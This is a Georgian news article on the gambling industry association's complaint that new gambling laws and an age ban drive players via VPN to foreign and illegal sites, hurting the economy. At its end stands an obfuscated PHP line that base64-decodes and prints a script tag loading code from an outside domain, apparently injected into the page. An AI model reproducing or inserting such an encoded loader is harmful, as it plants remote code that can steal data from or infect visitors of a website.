celsiusi
ავერსი საქკაბელი
საქართველოს სათამაშო ბიზნეს ასოციაციის (GGA ) მიერ გავრცელებულ ინფორმაციაში აღნიშნულია, რომ აკრძალვისა და რეგულაციების შედეგად მომხმარებელთა დიდი ნაწილი საერთაშორისო ონლაინ კაზინოებს მიმართავს და ის თანხა, რომელსაც ქართული კომპანიები და ქვეყნის ბიუჯეტი იღებდა, VPN-ის საშუალებით სხვა ქვეყნებში გადაინაცვლებს, ამით კი აზარტულ თამაშებზე დამოკიდებულების პრობლემა არ გადაიჭრება, საქართველოს ეკონომიკა კი დაზარალდება.  
 
ასოციიაციიაში ამბობენ, რომ „აზარტული თამაშების შესახებ“ კანონში შესული ცვლილებების გავლენით აზარტული თამაშების სექტორი 15%-ზე მეტით შემცირდა. ქართული ბიზნეს ოპერატორებისგან  განსხვავებით,  არ ზღუდავს უცხოური სათამაშო კომპანიების რეკლამას ქართულ ბაზარზე, შესაბამისად ქართველ მომხმარებლებს სმს-ის გაგზავნით შეუძლიათ უცხოურ  საიტებზე ვერიფიკაციის გავლა, თანხის ჩარიცხვა და მიღება.  
 
"ცვლილებებიდან გამომდინარე შეიძლება ითქვას, რომ ამ ეტაპზე სექტორს აქვს 15%-ზე მეტი კლება. გამოდის, რომ ამ სახსრების გადანაცვლება მოხდა უცხოურ საიტებზე, რადგან გამოიკვეთა ტენდენცია, რომ უცხოური საიტები აქტიურად არეკლამებენ საკუთარ პროდუქტებს ქართულ ბაზარზე, შემოსავლების სამსახური ამონიტორინგებს საქართველოში რეგისტრირებული ბიზნეოპერატორების რეკლამას, თუმცა იმავეს არ აკეთებს უცხოური კომპანიების მიმართ. 
 
კანონის აღსრულებისა და ადმინისტრირების კუთხით ძალიან უსამართლო და არათანაბარი სიტუაციაა ქართული ბიზნეს ოპერატორებსა და უცხოური ბიზნეს ოპერატორების მიმართ. უცხოურ საიტებს შეზღუდვა არ აქვთ, სმს-ის გაგზავნით შესაძლებელია ვერიფიკაცია გაიარო და თანხა ჩარიცხო/მიიღო.  ასოციაციის ხელმძღვანელი ყოველდღიურად გზავნის სქრინებს  სხვადასხვა სტრუქტურებში, რადგან ხელისუფლებას არ აქვს შესაბამისი ბერკეტი აკონტროლოს უცხოური საიტების რეკლამები. გარდა ამისა, ადმინისტრირების კუთხით მთავრობას არანაირი ძალაუფლება არ აქვს შეუზღუდოს უცხოური ბიზნესოპერატორების რაიმე მოქმედება საქართველოს ტერიტორიაზე, მაშინ როცა ქართულ ოპერატორებს ფეისბუქზეც არ შეუძლიათმოკლე ტექსტური შეტყობინება მისწერონ თავიანთ მომხმარებლებს და სარეკლამო შეთავაზება გაუგზავნონ. კანონის აღსრულების მსგავსი სუსტი მექანიზმები ორმაგად აზარალებს ქართულ ბიზნესოპერატორებს და შესაბამისად ქვეყნის ეკონომიკას.  
 
გარდა ამისა 18-25 წლამდე პირებისთვის თამაშის აკრძალვამ მათი არალეგალურ საიტებზე გადართვა და ე.წ. „ხელზე მაზაობის“ პრაქტიკა დააბრუნა.
 
"თუ საქართველოში ლეგალურ ოპერატორებს შევზღუდავთ, მოთამაშე მაინც იპოვის გზას, რომ გადაერთოს სხვა, მათ შორის, არალეგალურ საიტებზე. დაბრუნდება ე.წ. „ხელზე მაზაობის“ პრინციპები, რაც ადრე იყო და ქვეყანამ დიდი გზა გამოიარა ამის აღმოსაფხვრელად.“ - განაცხადა GGA–ს ადმინისტრაციულმა ხელმძღვანელმა გიორგი მამულაიშვილმა. 
 
მოსახლეობის ნაწილი ჩართულია არალეგალურ თამაშებში. საქართველოდან გაედინება  120 მილიონ ლარი წელიწადში,  ახალი კანონმდებლობით კი ეს რიცხვი სულ მცირე ათჯერ გაიზრდება. 18-დან 25 წლამდე ადამიანი, რომელიც არალეგალურ საიტებს და მათ ბონუსებს მიეჩვევა, საქართველოს ბაზარზე არ დაბრუნდება.
 
ასოციაციაში აღნიშნავენ, რომ დღესდღეობით მსოფლიოში არ არსებობს ისეთი ტექნოლოგია, რომლის მეშვეობითაც მოხდება ე.წ VPN - ის ბლოკირება, რისი ნათელი მაგალითია აშშ და ჩინეთი, რომელთაც, მიუხედავად განუსაზღვრელი რესურსისა, მაინც ვერ მოახერხეს მომხმარებლებისთვის ვირტუალურ პირად ქსელებზე წვდომის შეზღუდვა.
 
აქედან გამომდინარე შეიძლება ითქვას რომ რეგულაციების სრული პაკეტის ამოქმედებიდან ერთ თვეში, არ შეიცვალა მოთამაშეთა რაოდენობა, მათ უბრალოდ გადაინაცვლეს უცხოურ საიტებზე, ხოლო საქართველოს ეკონომიკა, ბიზნესგარემო და საქართველოს იმიჯი უცხოელი ინვესტორებისთვის და საერთაშორისო კომპანიებისთვის მკვეთრად დაზარალდა.
 
864
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");